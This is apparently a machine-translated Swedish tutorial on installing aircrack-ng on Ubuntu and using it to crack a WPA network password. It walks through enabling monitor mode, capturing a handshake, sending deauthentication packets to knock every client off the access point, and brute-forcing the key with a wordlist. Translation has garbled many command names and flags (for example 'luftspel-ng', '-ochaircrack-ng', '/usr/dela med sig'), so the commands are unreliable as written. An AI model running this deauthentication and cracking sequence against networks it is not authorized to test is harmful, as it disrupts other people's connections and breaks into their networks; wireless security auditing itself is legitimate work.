Installera Aircrack på Ubuntu

Install Aircrack Ng Ubuntu



Aircrack-ng är en hel uppsättning verktyg för trådlös säkerhetsgranskning. Den kan användas för att övervaka, testa, spricka eller attackera trådlösa säkerhetsprotokoll som WEP, WPA, WPA2. Aircrack-ng är kommandoradsbaserad och är tillgänglig för Windows och Mac OS och andra Unix-baserade operativsystem. Aircrack-ng-sviten innehåller många verktyg som används för olika ändamål, men här kommer vi bara att titta på några viktiga verktyg som används oftare i trådlös säkerhetstestning.

Airmon-ng







Airmon-ng används för att hantera trådlösa kortlägen och för att döda onödiga processer när du använder aircrack-ng. För att sniffa en trådlös anslutning måste du ändra ditt trådlösa kort från hanterat läge till övervakningsläge och airmon-ng används för detta ändamål.



Airodump-ng



Airodump-ng är en trådlös sniffer som kan fånga trådlös data från en eller flera trådlösa åtkomstpunkter. Den används för att analysera närliggande åtkomstpunkter och för att fånga handskakningar.





Airplay-ng

Aireplay-ng används för replay-attacker och som paketinjektor. Det kan vara av-autentisera användare från sina AP för att fånga handslag.



Airdecap-ng

Airdecap-ng används för att dekryptera krypterade WEP, WPA/WPA2 trådlösa paket med känd nyckel.

Aircrack-ng

Aircrack-ng används för att attackera trådlösa WPA/WEP-protokoll för att hitta nyckeln.

Aircrack-ng är lätt att installera i Ubuntu med APT. Skriv bara följande kommando så installeras alla tillgängliga verktyg i Aircrack-ng suite.

sudo apt-get uppdatering
sudo apt-get install -ochaircrack-ng

Användande

I den här artikeln tar vi en snabb titt på hur man använder aircrack-ng för att spricka ett krypterat trådlöst nätverk (TR1CKST3R i detta exempel) för att hitta lösenordet.

Lista först alla tillgängliga trådlösa kort som är anslutna till din dator med kommandot 'iwconfig'.

Vi kommer att använda 'wlxc83a35cb4546' namngivet trådlöst kort för denna handledning (Detta kan vara annorlunda i ditt fall). Döda nu alla processer som körs på trådlöst kort med airmon-ng.

[e -postskyddad]: ~ $sudoairmon-ng kontrolldöda
Starta Monitor -läget på ‘wlxc83a35cb4546’ genom att skriva
[e -postskyddad]: ~ $sudoairmon-ng start wlxc83a35cb4546

Nu har airmon-ng startat övervakningsläge på det trådlösa kortet, det kommer att se ut som ett annat namn 'wlan0mon'. Kör 'iwconfig' igen för att lista trådlösa detaljer.

Använd sedan airodump-ng för att se närliggande trådlösa åtkomstpunkter och deras egenskaper.

[e -postskyddad]: ~ $sudoairodump-ng wlan0mon

Du kan begränsa sökningen med hjälp av MAC (–bssid) och kanal (-c) filter. För att fånga handslag (Handshake innehåller krypterat lösenord) måste vi spara våra paket någonstans med –write -alternativet. Typ,

[e -postskyddad]: ~ $sudoairodump-ng--bss6C: B7:49: FC:62: E4
-c elvawlan0mon--skriva /tmp/handskakning

--bss: Access Points MAC -adress

-c: Access Points kanal[1-13]

--skriva: Lagrar fångade paket på en definierad plats

Nu måste vi de-autentisera varje enhet från denna åtkomstpunkt med hjälp av Aireplay-ng-verktyget. Skriva

[e -postskyddad]: ~ $sudoluftspel-ng-0 100 -till [MAC_ADD]wlan0mon

-a: Ange åtkomstpunkter MAC för Aireplay-ng

-0: Ange antal deauth -paket som ska skickas

Efter ett tag kommer alla enheter att kopplas bort från den åtkomstpunkten, när de försöker ansluta igen kommer körning av airodump-ng att fånga handskakningen. Det kommer att visas högst upp i springande airodump-ng.

Handshake lagras i katalogen ‘/tmp/’ och innehåller krypterat lösenord som kan tvingas brutalt offline med hjälp av en ordlista. För att knäcka lösenordet använder vi Aircrack-ng. Typ

[e -postskyddad]: ~ $sudoaircrack-ng/tmp/handskakning.kap-01.kap-i
/usr/dela med sig/ordlistor/rockyou.txt
-i: Ange ordlistans plats

Aircrack-ng kommer att gå igenom listan med lösenord, och om det hittas kommer det att visa lösenordet som används som nyckel.

I det här fallet hittade aircrack-ng lösenordet som användes '123456789'.

Stoppa nu övervakningsläget på det trådlösa kortet och starta om nätverkshanteraren.

[e -postskyddad]: ~ $sudoairmon-ng stopp wlan0mon
[e -postskyddad]: ~ $sudoservice network-manager restart

Slutsats

Aircrack-ng kan användas för att granska trådlös säkerhet eller för att spricka bort glömda lösenord. Det finns några andra liknande verktyg tillgängliga för detta ändamål som Kismet men aircrack-ng är mer känd för bra support, mångsidighet och ett brett utbud av verktyg. Det har lätt att använda kommandoradsgränssnittet som enkelt kan automatiseras med alla skriptspråk som Python.